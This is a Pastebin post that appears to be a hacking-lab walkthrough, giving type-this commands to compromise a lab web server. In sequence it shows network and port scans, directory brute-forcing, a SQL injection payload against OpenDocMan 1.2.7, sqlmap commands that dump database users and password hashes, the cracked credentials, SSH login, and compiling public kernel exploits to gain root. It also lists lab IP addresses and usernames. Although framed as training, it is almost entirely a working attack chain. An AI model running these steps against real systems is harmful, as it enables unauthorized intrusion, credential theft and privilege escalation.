Advertisement
joemccray

QuickLab

Jun 2nd, 2018
1,020
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.46 KB | None | 0 0
  1. Use Putty to SSH into my Ubuntu host in order to perform the lab tasks below.
  2.  
  3. You can download Putty from here:
  4. http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
  5.  
  6.  
  7. IP Address: 45.76.254.222
  8. Protocol: ssh
  9. Port: 22
  10. username: ceh
  11. password:
  12.  
  13.  
  14. Attack steps:
  15. -------------
  16.  
  17.  
  18.  
  19. Step 1: Ping sweep the target network
  20. -------------------------------------
  21.  
  22.  
  23. ---------------------------Type This-----------------------------------
  24. nmap -sP 172.31.2.0/24
  25. -----------------------------------------------------------------------
  26.  
  27.  
  28.  
  29. - Found 3 hosts
  30. 172.31.2.64
  31. 172.31.2.217
  32. 172.31.2.238
  33.  
  34.  
  35.  
  36. Step 2: Port scan target system
  37. -------------------------------
  38.  
  39.  
  40. ---------------------------Type This-----------------------------------
  41. nmap -sV 172.31.2.64
  42. -----------------------------------------------------------------------
  43.  
  44.  
  45.  
  46. -------------Scan Results--------------------------------------------
  47. PORT STATE SERVICE VERSION
  48. 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
  49. 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
  50. 514/tcp filtered shell
  51. 1037/tcp filtered ams
  52. 6667/tcp open irc ngircd
  53. Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  54. --------------------------------------------------------------------
  55.  
  56.  
  57. Step 3: Vulnerability Scan the webserver
  58. ----------------------------------------
  59.  
  60.  
  61. ---------------------------Type This-----------------------------------
  62. cd ~/toolz/Nikto2/program
  63.  
  64. perl nikto.pl -h 172.31.2.64
  65. -----------------------------------------------------------------------
  66.  
  67.  
  68. Step 4: Run dirbuster or similar directory bruteforce tool against the target
  69. -----------------------------------------------------------------------------
  70.  
  71.  
  72. ---------------------------Type This-----------------------------------
  73. cd ~/toolz/dirb/
  74.  
  75.  
  76. ./dirb http://172.31.2.64 wordlists/big.txt
  77. -----------------------------------------------------------------------
  78.  
  79.  
  80.  
  81. Step 5: Browse the web site to look for clues
  82. ---------------------------------------------
  83. To connect to the VPN open a web browser on your host machine (not your virtual machine) and go to the following URL:
  84. https://54.245.178.32/?src=connect
  85.  
  86. Accept the security exception and enter one of the following user names:
  87.  
  88. username: labuser001
  89. username: labuser002
  90. username: labuser003
  91. username: labuser004
  92. username: labuser005
  93. username: labuser006
  94. username: labuser007
  95. username: labuser008
  96. username: labuser009
  97. username: labuser010
  98. username: labuser011
  99. username: labuser012
  100. username: labuser013
  101. username: labuser014
  102. username: labuser015
  103. username: labuser016
  104. username: labuser017
  105. username: labuser018
  106. username: labuser019
  107. username: labuser020
  108.  
  109.  
  110.  
  111. Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
  112.  
  113.  
  114. ..... really didn't get much from here so we just opened the web page in a browser
  115. http://172.31.2.64/
  116.  
  117. .....browsed to the webpage and saw that it pointed to:
  118. http://172.31.2.64/jabc
  119.  
  120. ....clicked on documentation link and found hidden text that pointed to here:
  121. http://172.31.2.64/jabcd0cs/
  122.  
  123. ....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
  124. https://www.exploit-db.com/exploits/32075/
  125.  
  126. Tried the sql injection described in exploit-db:
  127. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9
  128.  
  129. http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9
  130.  
  131.  
  132.  
  133. Tried to run sqlmap against the target
  134.  
  135.  
  136. ---------------------------Type This-----------------------------------
  137. cd ~/toolz/sqlmap-dev/
  138. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql
  139.  
  140. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql
  141.  
  142. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql
  143.  
  144. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql
  145.  
  146. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
  147. -----------------------------------------------------------------------
  148.  
  149.  
  150.  
  151. FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
  152. FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net
  153.  
  154.  
  155.  
  156. ---------------------------Type This-----------------------------------
  157. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql
  158.  
  159. python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
  160. -----------------------------------------------------------------------
  161.  
  162. username: webmin
  163. hash: b78aae356709f8c31118ea613980954b
  164.  
  165. https://hashkiller.co.uk/md5-decrypter.aspx
  166.  
  167. hash: b78aae356709f8c31118ea613980954b
  168. pass: webmin1980
  169.  
  170.  
  171. ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.
  172.  
  173.  
  174.  
  175. ---------------------------Type This-----------------------------------
  176. ssh -l webmin 172.31.2.64
  177. webmin1980
  178.  
  179. id
  180.  
  181. cat /etc/*release
  182. -----------------------------------------------------------------------
  183.  
  184.  
  185.  
  186. ....tired of not having a real command shell...
  187.  
  188.  
  189. ---------------------------Type This-----------------------------------
  190. python -c 'import pty;pty.spawn("/bin/bash")'
  191.  
  192.  
  193. cd /tmp
  194.  
  195. pwd
  196.  
  197.  
  198. cat >> exploit.c << out
  199.  
  200. **************paste in the content from here *****************
  201. https://www.exploit-db.com/raw/39166/
  202.  
  203.  
  204. ------ hit enter a few times ------
  205.  
  206. ------ then type 'out' ----- this closes the file handle...
  207.  
  208.  
  209.  
  210. ---------------------------Type This-----------------------------------
  211. gcc -o boom exploit.c
  212.  
  213. ./boom
  214. -----------------------------------------------------------------------
  215.  
  216.  
  217. ------------exploit failed, damn let's try another one ---------
  218.  
  219.  
  220.  
  221. ---------------------------Type This-----------------------------------
  222. cat >> exploit2.c << out
  223.  
  224. **************paste in the content from here *****************
  225. https://www.exploit-db.com/raw/37292/
  226.  
  227.  
  228. out
  229.  
  230.  
  231. gcc -o boom2 exploit2.c
  232.  
  233. ./boom2
  234.  
  235. id
  236.  
  237.  
  238. ......YEAH - do the happy dance!!!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement